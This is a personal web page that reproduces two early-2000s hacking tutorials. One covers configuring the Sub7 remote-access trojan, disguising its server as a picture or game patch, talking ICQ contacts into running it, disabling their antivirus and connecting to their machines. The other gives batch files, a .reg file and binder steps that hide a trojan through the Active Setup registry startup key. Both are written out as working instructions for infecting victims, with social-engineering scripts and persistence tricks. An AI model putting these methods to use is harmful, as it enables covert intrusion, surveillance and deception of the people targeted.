What's New Page






Home Page

About Page

Photo Page

What's New Page

Favorite Links

Photo2 Page
  


BE A GOOD HACKER

HOW TO HACK

Volume 1 The Complete Guide To Sub7 By Switch Blade


The Information In This Document:
-Where to get sub7
-Using Editserver.exe
-How to Give Sub7 to your victim
-How to disable the Virus Scanner
-How To Connect
-Start Up Methods
-What to do




Terms

This document is of free distribution under ANY means, As long as the information remains INTACT.

Terms of use:
This is provided “as isâ€‌ This document has been created with educational intention ONLY. The consequences that the bad use of this information could bring back are the executer's responsibility ONLY .By reading this document, you are agree with this terms, if you are not, then DELETE this copy of the document RIGHT NOW. Switch Blade does not accept any responsibility for any circumstances that occur after you read this document, it's all your responsibility!





Where To Get Sub7:

Where to get Sub7
I know this is long, but it has all the info you need to use Sub7!


Ok firstly Sub7 is a must for all people who like to play around on the Internet, If you want Sub7 there are many sites you can get it from:

-http://subseven.slak.org [under construction at the time this was written!]
-http://tectop100.hypermart.net/substuff/
-http://www.geocities.com/sub_skin7 [under construction at time this was written, will be finished soon!!]


Ok now you've found a site with Sub7 on, which version do you get??
The Best version so far is still 2.1/2.1a/2.1b or 2.1gold [until 2.3 comes out] so for now we'll say get version 2.1b!

**NOTE**

If you have Anti-Virus software running it will detect the "Sub7.exe and Editserver.exe" to be viruses but don't worry they aren't the only virus is the "Server.exe" which is what you give to your victim!



Using Editserver And The Functions Of The Editserver Options:

Using Editserver.exe
First thing you'll have to do is modify the Server.exe, so go into to where-ever you have Sub7 and double click on "Editserver.exe" and you'll get a menu of how to modify the "Server.exe"!

آ¨So first thing you'll see is "Start Up Method[s]" this is how you want the Server to start up on your victims PC. You can have as many of these options selected so if you want to real nasty click them all so it's really hard to get rid of the "Server" but just selecting "win.ini" will do the job!

-Click Here For Full Information On Each Start-Up Method

آ¨Next you'll see Notifications, this is how you want to be notified that your victim is online. First enter your victims name: "John", Now ICQ notify is where you get paged on ICQ that your victim is online and what his IP number is. So just enter your ICQ number and select the box, Next is IRC notify [if you don't know what it is click the ?] just enter in your IRC details for that, Last is e-mail notify you have to have an e-mail address on the selected servers in the menu!

آ¨On the right you'll see "Installation" this is how the "Server" will set it's self up on the victims PC. First select "Automatically Start Server On Port:" and just type in a random number but keep it around the same as the default [keep the number safe], you can select "Use Random Port" but then you have to rely on Notification which can fail!, Next you'll see "Server Password" this means your Victim will have to enter a password to open the "Server" so just leave it! You can ignore the other box, and for IRC bot settings only do that if you know how to use IRC! Now you can call the server what ever you want when it's installed on the victims PC. So call it winRUN.exe or WinDLL.exe something that sounds importent to the Pc so they don't delete it **But remember to put a .com or .exe**, "Melt Server" means do you want the file you give them to delete once they've installed the virus? I normally select it, enable fake error message is basic. Do you want it to give them an error message when they install it?? you can put what ever you want if so select the box and type in the message you want it to say!!, Do you want it to bind with an .exe file so bind it with a game patch. So when they install the patch it also installs the virus! and Password protect is to protect the server from being opened with someone else's "Editserver.exe"

آ¨Last is at the top change the icon, change it to a picture icon, game icon or an icon you have on your hard drive! save it as pic.exe!

And that's it, now you have the server ready for the victim


The Easiest Way To Give Your Victim Sub7:

How to give your victim Sub7
First try and get a victim on ICQ as you can get there IP address straight away! Now once you have found someone, just chat to them and find out if they have a virus scanner [if so check the below paragraph, if not just jump that paragraph] don't jump straight into it first just give them easy questions like "A/S/L, how are you, Do you have a pic"
then ask them about the Virus Scanner, if they say why just say because about all the worms and viruses on the net, your just wondering what they are using as you might get some! now once you know that you are ready to give them the trap!

How to disable the Virus Scanner
There are two ways:
1] This is the easy way, you find out what virus scanner they use, then find the appropriate -"DAT Killer.exe" you can say it's a pic, or even a patch you know about for the virus scanner they have! Once they have clicked on it then the Virus Scanner is F***ed! Now just say you have [another] pic for them that you hope will work! or course it's the sub7 server you have created [remember to change the icon to the Paint Shop Pro Pallet icon] now once they double click on it "bang!" they are caught!
2] Just give them the server straight away as a pic, once they say it's a Virus. Blag your way around it. Say it must have become corrupt! on the download but it should still work!

How To Connect To The Victims PC:
Ok now you've done the hard part of giving them the Sub7 server saying it's a pic [remember to change the icon to the Paint Shop Pro Pallet icon]! now go into Sub7 and click on the IP button type on the line that says "ICQUIN" type the victims ICQ number, then press "resolve UIN" and it will give you there IP number, go back to the main screen and put in the IP on the "IP/UIN box" now in the box next to that put in the port you set the server to [27374 is the default] now click connect and your should be in!







Full Information On Start Up Techniques:
Common Registry Entries

Although there are many different ways to configure Sub7 to infect a computer there are also some common registry entries that are added no matter which option you select. These entries are encrypted, and are used to store configuration information for the server, such as passwords, and other configurable information. The following are added to the registry.

The key:

HKEY_LOCAL_MACHINEEnumPCIRZNSSS

There are also 21 values that are added to this registry key, which store information on the server in an encrypted form. There is also a new file association that is added to the registry to allow files with the extension .DL to be executed by windows. The following key is added to the registry.

HKEY_CLASSES_ROOT.dl

These values are added to the key to make it executable

HKEY_CLASSES_ROOT.dl(Default) = "exefile"
HKEY_CLASSES_ROOT.dlContent Type = "application/x-msdownload"

آ¨WIN.INI

This is an easy method to detect, the server file adds, or edits an entry to the WIN.INI file to load the server when windows starts up. This was the default method of starting the server in the version that I downloaded.

[windows]
run=MSREXE.EXE

NB There might also be other files that are loaded with this command like printer drivers or something, these are supposed to be there there is only the MSREXE.EXE file name that is not supposed to be there. Leave the others alone.

آ¨Registry Run

So that the trojan can run from the registry, and extra key is added to the registry, this is added to the run key of the registry. The value that is added to the registry is

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunWinLoader = "MSREXE.EXE"

آ¨Registry Run Services

There is also a second method that can be used to run the server fron the registry. This time the server is started from the Run Services key, as opposed to the Run key that is used in the first method. The value added to the Run Services key is

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServicesWinLoader = "MSREXE.EXE"

آ¨Less Known Method

This is another method that does not bother to use the registry to hide the server, instead it is stored in the SYSTEM.INI file. The server is added to the same line as windows explorer, to start up at the same time. The line that is modified is in the [boot] section, and is the line

[boot]
shell = explorer.exe MSREXE.EXE

This line may not be directly under [boot] but will be somewhere in that first block of statements.

NB Only the name of the server file MSREXE.EXE (or it might just be MSREXE) is used to start the server file. The explorer.exe (or possibly progman.exe) is a part of windows, and should not be removed, or changed.

آ¨Not Known Method

For the unknown method there are two files, as well as the MSREXE.EXE file that is added the same as with all other installation methods there is also a second file WINDOS.EXE that is added to the Windows directory. It is this file that is used to start the server, as it is this file that is added to the registry, the value is added here

HKEY_CLASSES_ROOTexefileshellopencommand(Default) = WINDOS.EXE
What To Do:



What To Do
Ok First DONT go f*cking up peoples hard drive cos that's just whack Sh!t. Use the real purpose of Sub7 to have fun!! Try all the options and see which works best for you.
Don't go leaving traces of you e.g. Name, E-mail, ICQ or even web page address! Otherwise all should be cool, and have fun!



Shouts And Praise To:
Shouts:
آ¨Yo big shout out to all the people working on the sub7 page with me,
آ¨Shout out to all you reading this
آ¨Shout out to my Digimortal team
-http://www.mp3.com/digimortal
آ¨Shout out to all those who took my Server file on ICQ I love you lot!
آ¨Shout out to all those who tried it on me and failed!

And huge shout to all my mates!!
آ¨Shout out to Boogie Man, Swift Cutthroat, Spinn DD and anyone who uses Sub7
reefa_2001@hotmail.com "no viruses"


If you find any problems with this or you need help then please e-mail me…




There Will Be More Volumes To Come
آ© Copyright SXB 2001, http://www.geocities.com/sub_skin7/

On Sub7 2.2 and 2.3
آ© Astalavista.com

HACKING 2

ActiveX starup Method

THIS IS A TUTORIAL ON THE HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components STARTUP METHOD
The active x installed components key can be used to run programs at windows startup.You would prefer this to other methods like win.ini,system.ini or the run services key to startup programs
as it's harder to detect.(i mean trojans and other progs)
Even if your victim is not to knowledgeable on this matter,he just has to use msconfig.exe(in win98) or other softwares that show registry entries in the run services key and your entry(i mean the entry that your trojan file adds) to this key can be removed easily.
I think this method was first used in subseven 2.2,it's my favourite.If for some reason you want to use a trojan server that does not support this metod ,read on.

Info on this method-
A key has to be created in HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\key-----(key stands for any keyname of your choice. (iron maiden,i will use this as an example) .so I would have to create this path-
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden
the name of the key should be "stubpath" and the value should be the path of your file.

example-

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden]
"StubPath"="c:\rev.exe"
(i will come back to this a little later)

You can try this on your pc with some friendly program ,so that u know what's goin on.
click on start
run
regedit
go to HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components
create a new key
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden
add a new string value
rename the name to stubpath and put the value as the path of your program
ex "name -StubPath value-c:\rev.exe
restart your pc

you'l find your program run at startup.Now go to HKEY_current_user\software\Microsoft\Active Setup\Installed Components ,you'l find a new key created with the keyname u chose(here ironmaiden).this key is created everytime a new key is created in HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components Now delete this key and restart your pc.You'l find your program running again.
So you would have figured out that your program starts up as long as the entry in HKEY_current_user\oftware\Microsoft\Active Setup\Installed Components
is not present.The trick here is to delete this key everytime your program runs ,so that it runs on next startup.I think in subseven 2.2, the server renames the key in hklm each time.(corect me if iam wrong here).

Now here's what u need-
1)a file binder(sennaspy one exe maker(kicks ass,has a lot of options like copy to some dir,can hide execution) http://www.megasecurity.org/Binders/Files/Ssoem2.0a.zip)
2)a command line registry manipulation tool(dtreg.exe is what i use, download it from http://www.tamedos.com/downloads)
3)your trojan file

1st step
choose a directory where you want your file to run from.i will suggest c:\windows\system\directx as an example(u should change it to something else).This is just to make the file harder to detect.

2nd step
use a binder like sennaspy or juntador to bind your server file to a bat file.
to create the bat file
open notepad
copy the following lines
//
cd system
cd directx
dtreg -deletekey "\hkcu\software\microsoft\active setup\installed components\ironmaiden"
//(without //)
save the file as something.bat

bind your file with something.bat file(in the same order,so that ur file is executed before something.bat).supress the output screen of something.bat by using the hide mode in sennaspy one exe maker.
this is your modified server that will startup each time.reName it as dxsetup.exe or something.

3rd step
open notepad
copy these lines
//

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden]
"StubPath"="c:\\windows\\system\\directx\\dxsetup.exe"

//(don't include //)
save it as dd.reg

create this bat file
//
cd temp
copy dxsetup.exe c:\windows\system\directx
copy dtreg.exe c:\windows\system\directx
regedit /s dd.reg
deltree /y *.*
//
save it as a bat file

now use your binder to bind the trojan file u created in step 2,dtreg.exe,the reg file dd.reg and the bat file u created above(in order given).set the files extract to c:\windows\temp.disable running of these programs.u just have to copy then to c:\windows\temp.the bound file is the file u got to infect people with.

iam sure there are other ways of doing this.please inform me if u know some better way.
this is my first tutorial.Send me your suggestions at headputty@ziplip.com




- the ip[s] of the server
- the server port
- the server password. blank if none
- name of the victim.
- computer username. useful if you want more info in the notification.
- if the notifications are protected, this is the password.
- the version of the server.
- the \windows\system\ folder of the server. used mainly for files.
- the \windows\ folder of the server. used mainly for files.
- the connection type [lan/modem/proxy].